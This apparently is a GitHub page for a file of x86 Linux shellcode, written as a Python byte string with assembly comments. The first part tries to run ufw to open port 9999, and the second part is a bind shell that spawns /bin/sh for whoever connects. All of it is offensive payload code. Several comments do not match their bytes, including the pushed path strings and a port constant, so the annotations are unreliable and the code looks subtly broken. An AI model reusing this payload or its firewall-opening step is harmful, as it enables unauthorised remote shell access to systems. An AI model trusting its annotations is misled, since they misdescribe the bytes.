-
-
Notifications
You must be signed in to change notification settings - Fork 2
/
shellcode
46 lines (45 loc) · 2.51 KB
/
shellcode
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
shellcode = (
b"\x31\xc0" # xor eax, eax
b"\x50" # push eax (NULL terminator for strings)
b"\x68\x74\x63\x2f\x00" # push "/tcp"
b"\x68\x39\x39\x39\x39" # push "9999"
b"\x68\x6c\x6c\x61\x77" # push "allow"
b"\x68\x77\x66\x75\x2f" # push "/usr"
b"\x68\x72\x73\x69\x62" # push "sbin"
b"\x68\x6e\x69\x62\x72" # push "bin"
b"\x89\xe1" # mov ecx, esp (pointer to "/usr/sbin/ufw")
b"\x99" # cdq
b"\xb0\x0b" # mov al, 0xb (execve syscall)
b"\xcd\x80" # int 0x80 (execute syscall)
# Part 2: Bind shell code
b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" # Clear registers
b"\xb0\x66\xb3\x01\x51\x53\x6a\x02" # socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
b"\x89\xe1\xcd\x80\x89\xc6" # Call socket and store the result in ebx
b"\xb0\x66\x31\xdb\xb3\x02" # Prepare for bind
b"\x68\x7f\x00\x00\x01" # push 127.0.0.1
b"\x66\x68\x27\x0f" # push port 9999 (0x2710)
b"\x66\x53" # push word for sockaddr_in struct
b"\x89\xe1" # mov ecx, esp (sockaddr_in)
b"\x6a\x10" # push 16 (size of sockaddr_in)
b"\x51" # push eax
b"\x56" # push esi
b"\x89\xe1" # mov ecx, esp
b"\xcd\x80" # Call bind
b"\xb0\x66\xb3\x04\x6a\x01" # Prepare listen
b"\x56\x89\xe1\xcd\x80" # Call listen
b"\xb0\x66\xb3\x05\x56\x56" # Prepare accept
b"\x89\xe1\xcd\x80\x89\xc3" # Call accept
b"\x31\xc9\xb0\x3f" # Prepare for dup2 loop
b"\xcd\x80\xb0\x3f\xb1\x01" # dup2(stdin)
b"\xcd\x80\xb0\x3f\xb1\x02" # dup2(stdout)
b"\xcd\x80\x31\xc0" # Clear eax
b"\x50" # push eax (NULL for execve)
b"\x68\x2f\x2f\x73\x68" # push "//sh"
b"\x68\x2f\x62\x69\x6e" # push "/bin"
b"\x89\xe3" # mov ebx, esp (pointer to "/bin//sh")
b"\x50" # push eax
b"\x53" # push ebx
b"\x89\xe1" # mov ecx, esp
b"\xb0\x0b" # syscall number for execve
b"\xcd\x80" # int 0x80 (execute shell)
)